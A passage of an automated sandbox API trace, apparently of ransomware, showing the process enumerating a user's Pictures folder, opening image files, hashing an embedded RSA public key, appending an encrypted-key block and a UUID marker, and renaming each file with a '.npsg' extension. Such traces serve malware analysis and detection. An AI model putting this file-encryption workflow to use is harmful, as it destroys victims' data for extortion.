Size=0x840) returned 0x3466428 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.358] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\") returned="NkpM1m8S\\" [0238.358] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0238.358] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.358] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.358] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.358] PathFindFileNameW (pszPath="") returned="" [0238.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5649ad30, ftCreationTime.dwHighDateTime=0x1d5bfe6, ftLastAccessTime.dwLowDateTime=0xe7e45550, ftLastAccessTime.dwHighDateTime=0x1d5c190, ftLastWriteTime.dwLowDateTime=0xe7e45550, ftLastWriteTime.dwHighDateTime=0x1d5c190, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.359] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5649ad30, ftCreationTime.dwHighDateTime=0x1d5bfe6, ftLastAccessTime.dwLowDateTime=0xe7e45550, ftLastAccessTime.dwHighDateTime=0x1d5c190, ftLastWriteTime.dwLowDateTime=0xe7e45550, ftLastWriteTime.dwHighDateTime=0x1d5c190, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.359] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5cd9a00, ftCreationTime.dwHighDateTime=0x1d5c132, ftLastAccessTime.dwLowDateTime=0xb0c9b10, ftLastAccessTime.dwHighDateTime=0x1d5be34, ftLastWriteTime.dwLowDateTime=0xb0c9b10, ftLastWriteTime.dwHighDateTime=0x1d5be34, nFileSizeHigh=0x0, nFileSizeLow=0x17f3c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6i1jjngnhiJ XRmHWy.gif", cAlternateFileName="6I1JJN~1.GIF")) returned 1 [0238.359] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\6i1jjngnhiJ XRmHWy.gif") returned=".gif" [0238.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\6i1jjngnhiJ XRmHWy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\6i1jjngnhij xrmhwy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.361] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=98108) returned 1 [0238.361] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.364] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x17f16, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.364] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.366] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x17f3c, lpOverlapped=0x0) returned 1 [0238.367] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.367] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.367] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.367] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.368] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.369] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.369] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.369] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.369] GetLastError () returned 0x0 [0238.369] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.369] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.369] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.369] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.369] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.370] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.371] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x17f3c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.371] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.371] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.371] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.371] CloseHandle (hObject=0x644) returned 1 [0238.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b85cd0 [0238.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0238.373] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\6i1jjngnhiJ XRmHWy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\6i1jjngnhij xrmhwy.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\6i1jjngnhiJ XRmHWy.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\6i1jjngnhij xrmhwy.gif.npsg")) returned 1 [0238.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b85cd0 | out: hHeap=0x620000) returned 1 [0238.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.374] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0238.376] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d159930, ftCreationTime.dwHighDateTime=0x1d5b5c9, ftLastAccessTime.dwLowDateTime=0x7fd24280, ftLastAccessTime.dwHighDateTime=0x1d5b93c, ftLastWriteTime.dwLowDateTime=0x7fd24280, ftLastWriteTime.dwHighDateTime=0x1d5b93c, nFileSizeHigh=0x0, nFileSizeLow=0x10449, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JaGqQ-wLvKlJ36x.jpg", cAlternateFileName="JAGQQ-~1.JPG")) returned 1 [0238.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.376] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\JaGqQ-wLvKlJ36x.jpg") returned=".jpg" [0238.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\JaGqQ-wLvKlJ36x.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\jagqq-wlvklj36x.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.378] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=66633) returned 1 [0238.378] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.381] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10423, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.381] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.383] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.383] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x10449, lpOverlapped=0x0) returned 1 [0238.384] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.384] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.384] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.384] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.385] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.385] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.385] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.385] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, 